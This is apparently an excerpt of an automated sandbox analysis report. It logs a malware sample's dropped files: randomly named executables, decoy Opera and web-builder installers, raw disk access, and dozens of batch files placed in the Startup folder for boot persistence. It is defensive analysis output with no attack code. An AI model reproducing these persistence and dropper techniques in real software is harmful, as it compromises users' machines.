                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\lUtN2EBQTg4XAhTAimO3WEPd.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\UyY0AJkHrNf9ELHT0hUQo1vI.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\bsQavSmX9wFQ2mntPGaltaow.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\h9Cux8w1auuBknjQZWKFquuD.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\VtYWoqhIxv66SdBYR6iCW9pR.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\sgtzC1bBRzEH97LXPXHm4FVd.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\JPkWbPiELiY3dVd0ezptZ3ko.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-05J74.tmp\FNi4gQqkHn29EqnTv0rxfxe1.tmpFile created: C:\Users\user\AppData\Local\Temp\is-HIELC.tmp\_isetup\_iscrypt.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\yXBgs4CMjv6Y3CFxbTDDkpre.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\xKfiOAaKjAfRiycTLJ3RQV4l.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpFile created: C:\Users\user\AppData\Local\Simple Web Builder Free\is-05C7R.tmpJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\86xjLODySsaA2ccNlRbH98y4.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\lsTOGQhYLrM0d7OftxaupYqW.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\uYudt0flCl0e0fQZ8vnWLOhm.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\XPVSCvEdYfmDBcCxUZISEmv8.exeJump to dropped file
                    Source: C:\Users\user\Pictures\FNi4gQqkHn29EqnTv0rxfxe1.exeFile created: C:\Users\user\AppData\Local\Temp\is-05J74.tmp\FNi4gQqkHn29EqnTv0rxfxe1.tmpJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\2h93Z8eIGDBBod8joPEiBXPj.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\N3UpPkceW0KxiJBLNKuqtisH.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\Q54LGmnZmhktpXP3y7EOrtRY.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\8p4ak8QNfpnbvonzNVxC2iTG.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\WeQ8sR5f2BmkTxQKPAa5RFoc.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\OkQwRZm1uDGIMvmp1IlBrcDl.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\oYJcrFAFnphIaAQPo8IrBCWh.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpFile created: C:\Users\user\AppData\Local\Simple Web Builder Free\is-PANN7.tmpJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\N82pZRBoHBOB1dfNMGUFcUyF.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\xzRRQmj1LpBxF1iTy72H1YWe.exeJump to dropped file
                    Source: C:\Users\user\Pictures\qvx2vm8LJ8TphvujtDcRyl5q.exeFile created: C:\Users\user\AppData\Local\Temp\is-H44T4.tmp\qvx2vm8LJ8TphvujtDcRyl5q.tmpJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\Rk1pfEVtKjXZKi5E0UJ5igqM.exeJump to dropped file
                    Source: C:\Users\user\Pictures\XgAVLWIvGKK9IeCrDuWuJavo.exeFile created: C:\Users\user\AppData\Local\Temp\Opera_installer_24031207530974345608.dllJump to dropped file
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeFile created: C:\Users\user\AppData\Local\Temp\Opera_installer_24031207530527645904.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\J8LomUCEiQeMvIGqlnqM0LZ5.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpFile created: C:\Users\user\AppData\Local\Simple Web Builder Free\libogg-0.dll (copy)Jump to dropped file
                    Source: C:\Users\user\Pictures\XgAVLWIvGKK9IeCrDuWuJavo.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\XgAVLWIvGKK9IeCrDuWuJavo.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpFile created: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\Imc6gJg8H4cjDDr1J0xEqhfy.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\OjJASGUU0KKc5KDT8IvLJBEe.exeJump to dropped file
                    Source: C:\Users\user\Pictures\bizN5UTpdWpltkCaYrvmwbQI.exeFile created: C:\Users\user\AppData\Local\Temp\Opera_installer_24031207531803244640.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\PPRbCMR3JwR3Rpdv3d5rSgFs.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\E6QKqd9T2KlIZuLZuluVgjTV.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpFile created: C:\Users\user\AppData\Local\Temp\is-3TQRB.tmp\_isetup\_setup64.tmpJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\93gthV73eSBvEuNxXjo0G1yI.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\W1VpqB7zp2RfA2iQxRvPzC6c.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeFile created: C:\ProgramData\DirectSoundDriver 2.36.198.67\DirectSoundDriver 2.36.198.67.exeJump to dropped file
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403120853491\opera_packageJump to dropped file
                    Source: C:\Users\user\Pictures\XgAVLWIvGKK9IeCrDuWuJavo.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403120853201\opera_packageJump to dropped file
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20240312085307048.log
                    Source: C:\Users\user\Pictures\xzRRQmj1LpBxF1iTy72H1YWe.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20240312085338724.log
                    Source: C:\Users\user\Pictures\XgAVLWIvGKK9IeCrDuWuJavo.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20240312085318383.log
                    Source: C:\Users\user\Pictures\bizN5UTpdWpltkCaYrvmwbQI.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20240312085332766.log

                    Boot Survival

                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe, Code function: CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive0 16_2_00401A4F
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe, Code function: CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive0 17_2_00401A4F
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe, Code function: CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive0 17_2_009BFE99
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JLskMOTKdJylvoD4fywb2xq9.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WbZbZUFbJRp9V9DhX6D6SbsF.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\V4vz7ooYcwTTy9p6mMfXbhaV.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KCLvXEQADdAafKsEPtvKcJuW.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\X3kzXxi5tUUbK9D3UM8FR6yB.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\V2Ua9TLWP47cusgrbbxD2ie8.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7CPf1BbnKQFsIHTCUVgPW2b1.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nnz2eQ1k1PBdAfnlioMuMIp1.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SQOPRbGOQslr1pMs9iyrT8Qb.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Oqdv9aQZnmchlZhQPGADj1vm.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wahfCAc9rxN7QFp93csP92wp.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d78Ytvj4V0ta2ZiqFQElQpre.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VFP6UagohjQssqJ93M7nVGAA.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nJ0fjaFyPdUTkd27RbJpgLbV.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\S8rXbw1cOVjTK1xkd0JIGo0q.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tUicDr528bg57zTahAKCbWLd.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ObMJW0CQyivHFgrnQOjeFbMk.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IZ5Y7BJc8EYdvXcnIuceiXSu.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tOLiiaY6ffsKgwiVZfFcFIn0.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Hx0sIwDO9BmAGJHgVaGYhDQe.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\oNjbvmMzdD4XPQKq54zqlNic.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kJdsA9VA9hS9yUHHqg0ft5DV.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EnCs8E67uVG6Eqs33R0VMIaX.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JqwWbmZjvUESTxkLyujvgfQ5.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Wvf29ezu4o4eQUDaEcLfHh2i.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gFEgarK2CmFukpJoHmXp7Y8A.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gcqaETM5DR0YwESEQzBRnZKK.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l4gvHRByQBP5m6HuFN5n1qeo.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3hhfUEZjih0hfMNE0tjXJNip.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IN4MpOFfotqkxFDb9xG1KgQ4.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Zo8clGYvUOyWdFarhfpUgMEN.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fbij73WE0HqnGHEPJLXCBbDZ.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8pqQfoi3HoiRfRwXXSLOFIGm.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mQAC01IWkyy1VpnNHreKqDP9.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9uMffQzKGugRkIptYVRImTQz.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rxQ6BYkPciRzcYhkKHNbCVXz.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wWETG3CiojJKDjCsayXNSC4C.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\X0SIO4n9RqqCJGm4W0OnxckQ.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xl8GqJiSNyzMP1kcdxSKb1Bh.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\eJCDCqQnLPdN2iu0NZDfecsS.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\klA8JmAQ7d3aYJKSY8AQnRqN.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vM0i9O3SmyJMeySMU7pfuQYS.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4a9nVr9EEyQmaNt6aATX1FLT.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\o9mC5xW9tKlp4kRcY0ENXFVx.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QDBulKT4KjP0Dmav2rPCTbex.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NqyzZEihnfaWqCPw2h2kjWPD.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EXd58WGELkWeCynxgQPHUgBr.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\suhoeipyv9Q7WtMqEht6w8l1.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4FESHHshWvY8UVRNyfERDlM3.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Nsezr6XoeqytkgoUxSHdidst.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\A59bAABCemJp5R456KFjelzs.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OtXKtregFQf6WT1poKNUeJKH.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JvJ8FkMpNTNcNAQ5IZH9OyrC.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VnZF9b2NC7ruhyyJEaYXF7zf.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f8V9tkdL17zpTARbGXvubKh0.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aJ5ZzPIw4W4iDW4JiJvEgRVK.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MoodA9bUbe1XXFqshkJJ2aMi.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aG0yXFGDgm4eQ3ZK7Tgv4Q9D.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SfjQUmStVGetNiV041PzaRXb.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CuVU21KjVTi8Wd9l97IXHCaJ.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jPxMLAdrGIX6lhwANnPtfdmI.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lNPfzNqweDyCrBqs3aG9H3ld.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Raxl5XZrmvvadNCoiM9FLM1Y.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\z2ZokpX7yw3dNDZbk7sMnpTY.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hDYTBIsUWgvU9DgjfmegeIG8.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dDOTNE5uA12l2ql1wlOLpcRF.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VA3T9NrhhZhF4wDb6Z4wF5ik.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jaUbcEKacTPqo4Q1E5vfMGYC.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZVr8x8v8WWDz7nLkoJBAPLpU.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DhFzVyJl1Qh3WRl61WvkIgtg.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5NnqgyNIFXV3fkGxjwFrvTVW.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\n5FvfFJp0xTBHsTUd1HtVjgf.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OYIEdBWtHabBbSeILpT9tflf.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\E5vcf50a1xrNZPss2hqKnW2D.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NRkNthlWHWKfvzr3Huo2Hk96.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0aJ4M3BmSoFSfJVoorcfM8Tu.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aRQMhYcR0xLeNlVzNud4PjhM.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Zu88srVplDcE4JudkCIsfMfK.bat
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3bJmXHWxFTLdtjfcK2Eo1CEB.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XwXewTdG4i3reg1W4KZwDkqE.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3GBEpW1FZQUrWvbMjKRmSlSD.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LzSfFK21XHlma9f2nC93iWKZ.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mYqDdzubQoYo0UMqzcaWhlCq.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jeY2PypT42qBGgOqmE9VOHfI.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ocJg40zsLJKmhTN6I8MsqjRk.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HSU3kmKANUWIev2Y6XGUJn4z.batJump to dropped file
